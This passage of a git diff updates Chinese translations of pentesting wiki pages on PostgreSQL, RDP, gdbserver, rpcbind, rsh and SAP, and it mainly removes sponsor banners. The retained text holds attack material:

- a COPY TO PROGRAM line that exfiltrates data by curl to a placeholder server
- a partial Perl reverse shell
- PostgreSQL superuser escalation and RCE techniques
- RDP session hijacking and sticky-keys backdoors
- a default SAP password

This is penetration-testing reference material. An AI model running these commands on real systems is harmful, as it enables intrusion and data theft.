'data_directory'; ``` -**注意:** 如果您无法从设置中检索当前数据目录路径,可以通过 `SELECT version()` 查询获取主要 PostgreSQL 版本,并尝试暴力破解路径。Unix 安装的 PostgreSQL 常见数据目录路径为 `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`。一个常见的集群名称是 `main`。 +**注意:** 如果您无法从设置中检索当前数据目录路径,可以通过 `SELECT version()` 查询获取主要 PostgreSQL 版本,并尝试暴力破解路径。 PostgreSQL 在 Unix 安装中的常见数据目录路径是 `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`。 常见的集群名称是 `main`。 2. 获取与目标表关联的文件节点的相对路径 @@ -313,7 +302,7 @@ SELECT setting FROM pg_settings WHERE name = 'data_directory'; SELECT pg_relation_filepath('{TABLE_NAME}') ``` -此查询应返回类似 `base/3/1337` 的内容。磁盘上的完整路径将是 `$DATA_DIRECTORY/base/3/1337`,即 `/var/lib/postgresql/13/main/base/3/1337`。 +此查询应返回类似 `base/3/1337` 的内容。 磁盘上的完整路径将是 `$DATA_DIRECTORY/base/3/1337`,即 `/var/lib/postgresql/13/main/base/3/1337`。 3. 通过 `lo_*` 函数下载文件节点 @@ -343,15 +332,15 @@ ON pg_attribute.attrelid = pg_class.oid WHERE pg_class.relname = '{TABLE_NAME}'; ``` -5. 使用 [PostgreSQL 文件节点编辑器](https://github.com/adeadfed/postgresql-filenode-editor) [编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users);将所有 `rol*` 布尔标志设置为 1 以获得完全权限。 +5. 使用 [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) [编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users);将所有 `rol*` 布尔标志设置为 1 以获得完全权限。 ```bash python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA} ``` -![PostgreSQL 文件节点编辑器演示](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif) +![PostgreSQL Filenode Editor 演示](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif) -6. 通过 `lo_*` 函数重新上传编辑后的文件节点,并覆盖磁盘上的原始文件 +6. 通过 `lo_*` 函数重新上传编辑过的文件节点,并覆盖磁盘上的原始文件 ```sql SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64')) @@ -366,13 +355,13 @@ SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea) 8. 现在您应该在 PostgreSQL 中看到更新的表值。 -您还可以通过编辑 `pg_authid` 表成为超级管理员。**请参见** [**以下部分**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)。 +您还可以通过编辑 `pg_authid` 表成为超级管理员。 **请参见** [**以下部分**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)。 ## RCE ### **RCE 到程序** -自[ 版本 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html)以来,只有 **超级用户** 和 **`pg_execute_server_program`** 组的成员可以使用 copy 进行 RCE(带有外泄的示例: +自[版本 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html)以来,只有 **超级用户** 和 **`pg_execute_server_program`** 组的成员可以使用 copy 进行 RCE(示例带有外泄: ```sql '; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- - ``` @@ -399,7 +388,7 @@ COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::I > [**更多信息。**](pentesting-postgresql.md#privilege-escalation-with-createrole) 或者使用 **metasploit** 的 `multi/postgres/postgres_copy_from_program_cmd_exec` 模块。\ -有关此漏洞的更多信息 [**在这里**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)。虽然被报告为 CVE-2019-9193,但 Postges 声明这是一个 [特性,并且不会修复](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/)。 +有关此漏洞的更多信息 [**在这里**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)。虽然被报告为 CVE-2019-9193,但 Postges 声明这是一项 [功能,并且不会修复](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/)。 ### 使用 PostgreSQL 语言的 RCE @@ -420,7 +409,7 @@ COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::I > [!NOTE] > 以下 RCE 向量在受限 SQLi 上下文中特别有用,因为所有步骤都可以通过嵌套的 SELECT 语句执行 -PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥有,该用户运行数据库,因此作为 **超级用户**,您可以在文件系统中写入文件,因此您可以 **覆盖此文件。** +PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥有,该用户正在运行数据库,因此作为 **超级用户**,您可以在文件系统中写入文件,因此您可以 **覆盖此文件。** ![](<../images/image (322).png>) @@ -432,7 +421,7 @@ PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥 - `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` 数据库私钥的路径 - `ssl_passphrase_command = ''` 如果私钥文件受到密码保护(加密),PostgreSQL 将 **执行此属性中指示的命令**。 -- `ssl_passphrase_command_supports_reload = off` **如果** 此属性为 **on**,则 **当** 密钥受到密码保护时 **执行的命令** **将在 `pg_reload_conf()` 被 **执行** 时执行。 +- `ssl_passphrase_command_supports_reload = off` **如果** 此属性为 **on**,则 **如果** 密钥受到密码保护,**将执行** 的 **命令** 在 `pg_reload_conf()` 被 **执行** 时。 然后,攻击者需要: @@ -446,7 +435,7 @@ PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥 2. `ssl_passphrase_command_supports_reload = on` 6. 执行 `pg_reload_conf()` -在测试此时,我注意到这仅在 **私钥文件具有 640 权限**,且 **由 root 拥有**,并且由 **ssl-cert 或 postgres 组** 拥有(因此 postgres 用户可以读取它),并且放置在 _/var/lib/postgresql/12/main_ 中时有效。 +在测试此时,我注意到这仅在 **私钥文件具有 640 权限** 时有效,且 **由 root 拥有**,并且由 **ssl-cert 或 postgres 组** 拥有(因此 postgres 用户可以读取它),并且放置在 _/var/lib/postgresql/12/main_ 中。 #### **使用 archive_command 的 RCE** @@ -472,7 +461,7 @@ PostgreSQL 的 **配置文件** 是 **可写的**,由 **postgres 用户** 拥 - `session_preload_libraries` -- PostgreSQL 服务器将在客户端连接时加载的库。 - `dynamic_library_path` -- PostgreSQL 服务器将搜索库的目录列表。 -我们可以将 `dynamic_library_path` 值设置为一个由运行数据库的 `postgres` 用户可写的目录,例如 `/tmp/` 目录,并在其中上传一个恶意的 `.so` 对象。接下来,我们将通过将其包含在 `session_preload_libraries` 变量中,强制 PostgreSQL 服务器加载我们新上传的库。 +我们可以将 `dynamic_library_path` 值设置为一个由运行数据库的 `postgres` 用户可写的目录,例如 `/tmp/` 目录,并在其中上传恶意的 `.so` 对象。接下来,我们将通过将其包含在 `session_preload_libraries` 变量中,强制 PostgreSQL 服务器加载我们新上传的库。 攻击步骤是: @@ -556,9 +545,9 @@ GRANT pg_write_server_files TO username; #Change password ALTER USER user_name WITH PASSWORD 'new_password'; ``` -#### 提权到 SUPERUSER +#### Privesc to SUPERUSER -发现 **本地用户可以在 PostgreSQL 中登录而无需提供任何密码** 是相当常见的。因此,一旦您获得了 **执行代码的权限**,您可以滥用这些权限来授予您 **`SUPERUSER`** 角色: +很常见的是发现 **本地用户可以在 PostgreSQL 中登录而无需提供任何密码**。因此,一旦您获得了 **执行代码的权限**,您可以滥用这些权限来授予您 **`SUPERUSER`** 角色: ```sql COPY (select '') to PROGRAM 'psql -U -c "ALTER USER WITH SUPERUSER;"'; ``` @@ -593,8 +582,8 @@ save_sec_context | SECURITY_RESTRICTED_OPERATION); 1. 首先创建一个新表。 2. 向表中插入一些无关的内容,以提供索引函数的数据。 3. 开发一个包含代码执行有效负载的恶意索引函数,允许执行未经授权的命令。 -4. 将表的所有者更改为 "cloudsqladmin",这是 GCP 的超级用户角色,仅用于 Cloud SQL 管理和维护数据库。 -5. 对表执行 ANALYZE 操作。此操作迫使 PostgreSQL 引擎切换到表所有者 "cloudsqladmin" 的用户上下文。因此,恶意索引函数以 "cloudsqladmin" 的权限被调用,从而启用之前未经授权的 shell 命令的执行。 +4. 将表的所有者更改为 "cloudsqladmin",这是 GCP 的超级用户角色,专门用于 Cloud SQL 管理和维护数据库。 +5. 对表执行 ANALYZE 操作。此操作迫使 PostgreSQL 引擎切换到表所有者 "cloudsqladmin" 的用户上下文。因此,恶意索引函数以 "cloudsqladmin" 的权限被调用,从而使之前未经授权的 shell 命令得以执行。 在 PostgreSQL 中,这个流程看起来像这样: ```sql @@ -656,7 +645,7 @@ SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2; ``` ### **自定义定义的函数与** SECURITY DEFINER -[**在这篇文章中**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql),渗透测试人员能够在IBM提供的postgres实例中进行权限提升,因为他们**发现了这个带有SECURITY DEFINER标志的函数**: +[**在这篇文章中**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql),渗透测试人员能够在IBM提供的postgres实例中进行权限提升,因为他们**发现了这个带有 SECURITY DEFINER 标志的函数**: 
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
 RETURNS text
@@ -679,7 +668,7 @@ PERFORM dblink_disconnect();
 
 正如[**文档中所解释的**](https://www.postgresql.org/docs/current/sql-createfunction.html),带有**SECURITY DEFINER的函数是以** **拥有者的权限** **执行的**。因此,如果该函数**易受SQL注入攻击**或正在执行一些**由攻击者控制的参数的特权操作**,则可能被滥用以**在postgres中提升权限**。
 
-在前面代码的第4行中可以看到该函数具有**SECURITY DEFINER**标志。
+在前面代码的第4行中,您可以看到该函数具有**SECURITY DEFINER**标志。
 ```sql
 CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
 user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
@@ -689,10 +678,10 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
 
 

 
-### 使用 PL/pgSQL 进行密码暴力破解
+### 使用 PL/pgSQL 进行暴力破解
 
-**PL/pgSQL** 是一种**功能齐全的编程语言**,与 SQL 相比,它提供了更大的过程控制。它支持使用**循环**和其他**控制结构**来增强程序逻辑。此外,**SQL 语句**和**触发器**能够调用使用**PL/pgSQL 语言**创建的函数。这种集成使得数据库编程和自动化的方法更加全面和多样化。\
-**您可以利用这种语言来请求 PostgreSQL 进行用户凭据的暴力破解。**
+**PL/pgSQL** 是一种**功能齐全的编程语言**,与 SQL 相比,它提供了更大的过程控制。它允许使用**循环**和其他**控制结构**来增强程序逻辑。此外,**SQL 语句**和**触发器**能够调用使用**PL/pgSQL 语言**创建的函数。这种集成使得数据库编程和自动化的方法更加全面和多样化。\
+**您可以滥用这种语言来请求 PostgreSQL 进行用户凭据的暴力破解。**
 
 {{#ref}}
 ../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@@ -703,16 +692,16 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
 > [!NOTE]
 > 以下权限提升向量在受限的 SQLi 上下文中特别有用,因为所有步骤都可以通过嵌套的 SELECT 语句执行
 
-如果您可以**读取和写入 PostgreSQL 服务器文件**,您可以通过覆盖与内部 `pg_authid` 表关联的 PostgreSQL 磁盘文件节点来**成为超级用户**。
+如果您可以**读取和写入 PostgreSQL 服务器文件**,您可以通过覆盖与内部 `pg_authid` 表相关联的 PostgreSQL 磁盘文件节点来**成为超级用户**。
 
 有关**此技术**的更多信息[**请点击这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/)**。**
 
 攻击步骤如下:
 
 1. 获取 PostgreSQL 数据目录
-2. 获取与 `pg_authid` 表关联的文件节点的相对路径
+2. 获取与 `pg_authid` 表相关联的文件节点的相对路径
 3. 通过 `lo_*` 函数下载文件节点
-4. 获取与 `pg_authid` 表关联的数据类型
+4. 获取与 `pg_authid` 表相关联的数据类型
 5. 使用 [PostgreSQL 文件节点编辑器](https://github.com/adeadfed/postgresql-filenode-editor) [编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table);将所有 `rol*` 布尔标志设置为 1 以获得完全权限。
 6. 通过 `lo_*` 函数重新上传编辑后的文件节点,并覆盖磁盘上的原始文件
 7. _(可选)_ 通过运行一个昂贵的 SQL 查询清除内存中的表缓存
@@ -752,16 +741,8 @@ string pgadmin4.db
 ```
 ### pg_hba
 
-PostgreSQL中的客户端身份验证通过一个名为**pg_hba.conf**的配置文件进行管理。该文件包含一系列记录,每条记录指定了连接类型、客户端IP地址范围(如适用)、数据库名称、用户名以及用于匹配连接的身份验证方法。第一个匹配连接类型、客户端地址、请求的数据库和用户名的记录将用于身份验证。如果身份验证失败,则没有后备或备用方案。如果没有记录匹配,则拒绝访问。
+PostgreSQL中的客户端身份验证通过一个名为**pg_hba.conf**的配置文件进行管理。该文件包含一系列记录,每条记录指定了连接类型、客户端IP地址范围(如适用)、数据库名称、用户名以及用于匹配连接的身份验证方法。第一个匹配连接类型、客户端地址、请求的数据库和用户名的记录用于身份验证。如果身份验证失败,则没有后备或备用。如果没有记录匹配,则拒绝访问。
 
 pg_hba.conf中可用的基于密码的身份验证方法有**md5**、**crypt**和**password**。这些方法在密码传输方式上有所不同:MD5哈希、crypt加密或明文。需要注意的是,crypt方法不能与在pg_authid中加密的密码一起使用。
 
 {{#include ../banners/hacktricks-training.md}}
-
-

-
-\
-使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql)轻松构建和**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %}
diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md
index 25b8a596b..7abdf7168 100644
--- a/src/network-services-pentesting/pentesting-rdp.md
+++ b/src/network-services-pentesting/pentesting-rdp.md
@@ -2,14 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用程序、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ## 基本信息
 
 由微软开发的**远程桌面协议**(**RDP**)旨在通过网络实现计算机之间的图形界面连接。为了建立这样的连接,用户使用**RDP**客户端软件,同时,远程计算机需要运行**RDP**服务器软件。此设置允许无缝控制和访问远程计算机的桌面环境,基本上将其界面带到用户的本地设备上。
@@ -21,7 +13,7 @@ PORT     STATE SERVICE
 ```
 ## 枚举
 
-### 自动化
+### 自动
 ```bash
 nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 
 ```
@@ -53,19 +45,11 @@ rdp_check.py 来自 impacket 让你检查某些凭据是否对 RDP 服务有效
 ```bash
 rdp_check /:@
 ```
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ## **攻击**
 
 ### 会话窃取
 
-通过**SYSTEM权限**,您可以访问任何**用户打开的RDP会话**,无需知道所有者的密码。
+通过 **SYSTEM 权限**,您可以访问任何 **用户打开的 RDP 会话**,而无需知道所有者的密码。
 
 **获取打开的会话:**
 ```
@@ -90,9 +74,9 @@ ts::remote /id:2    #Connect to the session
 ```
 ### Sticky-keys & Utilman
 
-将此技术与 **stickykeys** 或 **utilman** 结合使用,您将能够随时访问管理 CMD 和任何 RDP 会话。
+结合这个技术与 **stickykeys** 或 **utilman**,您将能够随时访问管理 CMD 和任何 RDP 会话。
 
-您可以使用以下链接搜索已经被这些技术后门的 RDP:[https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
+您可以使用以下链接搜索已经被这些技术后门化的 RDP:[https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
 
 ### RDP 进程注入
 
@@ -110,7 +94,7 @@ net localgroup "Remote Desktop Users" UserLoginName /add
 
 - [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
 
-**AutoRDPwn** 是一个用 Powershell 创建的后渗透框架,主要用于自动化对 Microsoft Windows 计算机的 **Shadow** 攻击。此漏洞(被微软列为一项功能)允许远程攻击者 **在未获得受害者同意的情况下查看其桌面**,甚至可以按需控制它,使用操作系统本身的原生工具。
+**AutoRDPwn** 是一个用 Powershell 创建的后渗透框架,主要用于自动化对 Microsoft Windows 计算机的 **Shadow** 攻击。此漏洞(被 Microsoft 列为一项功能)允许远程攻击者 **在未获得受害者同意的情况下查看其桌面**,甚至可以按需控制它,使用操作系统本身的本地工具。
 
 - [**EvilRDP**](https://github.com/skelsec/evilrdp)
 - 从命令行以自动化方式控制鼠标和键盘
@@ -138,12 +122,4 @@ Name: Nmap
 Description: Nmap with RDP Scripts
 Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
 ```
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来绘制攻击面,找到让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-remote-gdbserver.md b/src/network-services-pentesting/pentesting-remote-gdbserver.md
index 8cfd0cca8..9252be008 100644
--- a/src/network-services-pentesting/pentesting-remote-gdbserver.md
+++ b/src/network-services-pentesting/pentesting-remote-gdbserver.md
@@ -2,17 +2,9 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用程序、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 ## **基本信息**
 
-**gdbserver** 是一个可以远程调试程序的工具。它与需要调试的程序在同一系统上运行,称为“目标”。这种设置允许 **GNU Debugger** 从不同的机器“主机”连接,主机上存储着源代码和被调试程序的二进制副本。**gdbserver** 和调试器之间的连接可以通过 TCP 或串行线进行,从而实现灵活的调试设置。
+**gdbserver** 是一个可以远程调试程序的工具。它与需要调试的程序在同一系统上运行,称为“目标”。这种设置允许 **GNU Debugger** 从另一台机器(“主机”)连接,其中存储了源代码和被调试程序的二进制副本。**gdbserver** 和调试器之间的连接可以通过 TCP 或串行线进行,从而实现灵活的调试设置。
 
 您可以让 **gdbserver 在任何端口上监听**,目前 **nmap 无法识别该服务**。
 
@@ -181,12 +173,4 @@ gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')
 
 RemoteCmd()
 ```
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-rlogin.md b/src/network-services-pentesting/pentesting-rlogin.md
index 604d73a44..b41da33c8 100644
--- a/src/network-services-pentesting/pentesting-rlogin.md
+++ b/src/network-services-pentesting/pentesting-rlogin.md
@@ -2,13 +2,10 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
 
 ## 基本信息
 
-在过去,**rlogin** 被广泛用于远程管理任务。然而,由于安全性方面的担忧,它在很大程度上被 **slogin** 和 **ssh** 所取代。这些新方法为远程连接提供了增强的安全性。
+在过去,**rlogin** 被广泛用于远程管理任务。然而,由于对其安全性的担忧,它在很大程度上被 **slogin** 和 **ssh** 所取代。这些新方法为远程连接提供了更强的安全性。
 
 **默认端口:** 513
 ```
@@ -30,8 +27,4 @@ rlogin  -l 
 ```
 find / -name .rhosts
 ```
-

-
-{% embed url="https://websec.nl/" %}
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-rpcbind.md b/src/network-services-pentesting/pentesting-rpcbind.md
index 2bac03fcc..f661fc833 100644
--- a/src/network-services-pentesting/pentesting-rpcbind.md
+++ b/src/network-services-pentesting/pentesting-rpcbind.md
@@ -2,13 +2,9 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
-
 ## 基本信息
 
-**Portmapper** 是一种用于将网络服务端口映射到 **RPC**(远程过程调用)程序编号的服务。它作为 **Unix-based systems** 中的一个关键组件,促进了这些系统之间的信息交换。与 **Portmapper** 相关的 **port** 经常被攻击者扫描,因为它可以揭示有价值的信息。这些信息包括正在运行的 **Unix 操作系统 (OS)** 的类型以及系统上可用服务的详细信息。此外,**Portmapper** 通常与 **NFS (网络文件系统)**、**NIS (网络信息服务)** 和其他 **基于 RPC 的服务** 一起使用,以有效管理网络服务。
+**Portmapper** 是一种用于将网络服务端口映射到 **RPC**(远程过程调用)程序编号的服务。它作为 **Unix-based systems** 中的一个关键组件,促进了这些系统之间的信息交换。与 **Portmapper** 相关的 **port** 经常被攻击者扫描,因为它可以揭示有价值的信息。这些信息包括正在运行的 **Unix Operating System (OS)** 的类型以及系统上可用服务的详细信息。此外,**Portmapper** 通常与 **NFS (Network File System)**、**NIS (Network Information Service)** 和其他 **RPC-based services** 一起使用,以有效管理网络服务。
 
 **默认端口:** 111/TCP/UDP,Oracle Solaris 中的 32771
 ```
@@ -42,7 +38,7 @@ nmap -sSUC -p111 192.168.10.1
 
 ![](<../images/image (859).png>)
 
-探索之旅始于必要软件包的安装(`apt-get install nis`)。接下来的步骤需要使用 `ypwhich` 通过域名和服务器 IP 确认 NIS 服务器的存在,确保这些元素为安全而匿名化。
+探索之旅始于必要软件包的安装(`apt-get install nis`)。接下来的步骤需要使用 `ypwhich` 通过域名和服务器 IP 确认 NIS 服务器的存在,确保这些元素在安全方面是匿名的。
 
 最后一步也是关键一步涉及 `ypcat` 命令提取敏感数据,特别是加密的用户密码。这些哈希值一旦使用像 **John the Ripper** 这样的工具破解,将揭示系统访问和权限的见解。
 ```bash
@@ -57,10 +53,10 @@ ypcat –d  –h  passwd.byname
 
 | **主文件**       | **映射**                   | **备注**                          |
 | ---------------- | -------------------------- | --------------------------------- |
-| /etc/hosts       | hosts.byname, hosts.byaddr | 包含主机名和 IP 详细信息         |
-| /etc/passwd      | passwd.byname, passwd.byuid| NIS 用户密码文件                 |
-| /etc/group       | group.byname, group.bygid  | NIS 组文件                       |
-| /usr/lib/aliases | mail.aliases               | 邮件别名详细信息                 |
+| /etc/hosts       | hosts.byname, hosts.byaddr | 包含主机名和 IP 详细信息          |
+| /etc/passwd      | passwd.byname, passwd.byuid | NIS 用户密码文件                  |
+| /etc/group       | group.byname, group.bygid  | NIS 组文件                        |
+| /usr/lib/aliases | mail.aliases               | 邮件别名详细信息                  |
 
 ## RPC 用户
 
@@ -72,7 +68,7 @@ ypcat –d  –h  passwd.byname
 
 ## 绕过过滤的 Portmapper 端口
 
-在进行 **nmap 扫描** 并发现开放的 NFS 端口时,如果端口 111 被过滤,直接利用这些端口是不可行的。然而,通过 **在本地模拟一个 portmapper 服务并从你的机器创建一个隧道到目标**,利用标准工具进行利用成为可能。这种技术允许绕过端口 111 的过滤状态,从而访问 NFS 服务。有关此方法的详细指导,请参阅 [此链接](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) 中的文章。
+在进行 **nmap 扫描** 并发现端口 111 被过滤的开放 NFS 端口时,直接利用这些端口是不可行的。然而,通过 **在本地模拟一个 portmapper 服务并从你的机器创建一个隧道到目标**,利用标准工具进行利用成为可能。这种技术允许绕过端口 111 的过滤状态,从而访问 NFS 服务。有关此方法的详细指导,请参阅 [this link](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) 中的文章。
 
 ## Shodan
 
@@ -82,10 +78,6 @@ ypcat –d  –h  passwd.byname
 
 - 在 [**Irked HTB 机器**](https://app.hackthebox.com/machines/Irked) 中练习这些技术。
 
-

-
-{% embed url="https://websec.nl/" %}
-
 ## HackTricks 自动命令
 ```
 Protocol_Name: Portmapper    #Protocol Abbreviation if there is one.
diff --git a/src/network-services-pentesting/pentesting-rsh.md b/src/network-services-pentesting/pentesting-rsh.md
index 5074c7e09..49dfca27c 100644
--- a/src/network-services-pentesting/pentesting-rsh.md
+++ b/src/network-services-pentesting/pentesting-rsh.md
@@ -2,19 +2,13 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证:
-
-{% embed url="https://academy.8ksec.io/" %}
-
 ## 基本信息
 
-在身份验证中,**.rhosts** 文件与 **/etc/hosts.equiv** 一起被 **Rsh** 使用。身份验证依赖于IP地址和域名系统(DNS)。伪造IP地址的容易性,特别是在本地网络上,是一个显著的漏洞。
+对于身份验证,**.rhosts** 文件和 **/etc/hosts.equiv** 被 **Rsh** 使用。身份验证依赖于 IP 地址和域名系统 (DNS)。伪造 IP 地址的容易性,尤其是在本地网络上,是一个显著的漏洞。
 
-此外,**.rhosts** 文件通常放置在用户的主目录中,这些目录通常位于网络文件系统(NFS)卷上。
+此外,**.rhosts** 文件通常放置在用户的主目录中,这些目录通常位于网络文件系统 (NFS) 卷上。
 
-**默认端口**:514
+**默认端口**: 514
 
 ## 登录
 ```
diff --git a/src/network-services-pentesting/pentesting-sap.md b/src/network-services-pentesting/pentesting-sap.md
index 71fba2083..711f72ddd 100644
--- a/src/network-services-pentesting/pentesting-sap.md
+++ b/src/network-services-pentesting/pentesting-sap.md
@@ -1,29 +1,24 @@
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-{% embed url="https://websec.nl/" %}
-
 # 关于SAP的介绍
 
-SAP代表数据处理中的系统应用和产品。根据定义,SAP也是ERP(企业资源规划)软件的名称,以及公司的名称。
+SAP代表数据处理中的系统应用和产品。根据定义,SAP也是ERP(企业资源规划)软件的名称,以及公司的名称。  
 SAP系统由多个完全集成的模块组成,几乎涵盖了业务管理的每个方面。
 
-每个SAP实例(或SID)由三个层次组成:数据库、应用程序和演示,每个环境通常由四个实例组成:开发、测试、质量保证和生产。
-每个层次在某种程度上都可以被利用,但通过**攻击数据库**可以获得最大的效果。
+每个SAP实例(或SID)由三层组成:数据库、应用程序和展示,每个环境通常由四个实例组成:开发、测试、质量保证和生产。  
+每一层在某种程度上都可以被利用,但通过**攻击数据库**可以获得最大的效果。
 
-每个SAP实例被划分为多个客户端。每个客户端都有一个用户SAP\*,这是应用程序的“root”相当于。
-在初始创建时,这个用户SAP\*会获得一个默认密码:“060719992”(更多默认密码见下文)。
+每个SAP实例被划分为多个客户端。每个客户端都有一个用户SAP\*,这是应用程序的“root”相当于。  
+在初始创建时,这个用户SAP\*会获得一个默认密码:“060719992”(更多默认密码见下文)。  
 如果你知道这些**密码在测试或开发环境中并没有被更改的频率**,你会感到惊讶!
 
-尝试使用用户名<SID>adm访问任何服务器的shell。
-暴力破解可能会有所帮助,但可能会有账户锁定机制。
+尝试使用用户名<SID>adm访问任何服务器的shell。暴力破解可能会有所帮助,但可能会有账户锁定机制。
 
 # 发现
 
 > 下一部分主要来自[https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures)的用户shipcod3!
 
-- 检查应用程序范围或测试的程序简要。注意连接到SAP GUI的主机名或系统实例。
+- 检查应用程序范围或测试的程序简要。注意连接到SAP GUI的主机名或系统实例。  
 - 使用OSINT(开源情报)、Shodan和Google Dorks检查文件、子域和有价值的信息,如果应用程序是面向互联网或公开的:
 ```text
 inurl:50000/irj/portal
@@ -38,7 +33,7 @@ https://www.shodan.io/search?query=SAP+J2EE+Engine
 
 ![SAP 登录屏幕](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
 
-- 使用 nmap 检查开放端口和已知服务(sap 路由器,webdnypro,web 服务,web 服务器等)。
+- 使用 nmap 检查开放端口和已知服务(sap 路由器、webdnypro、web 服务、web 服务器等)。
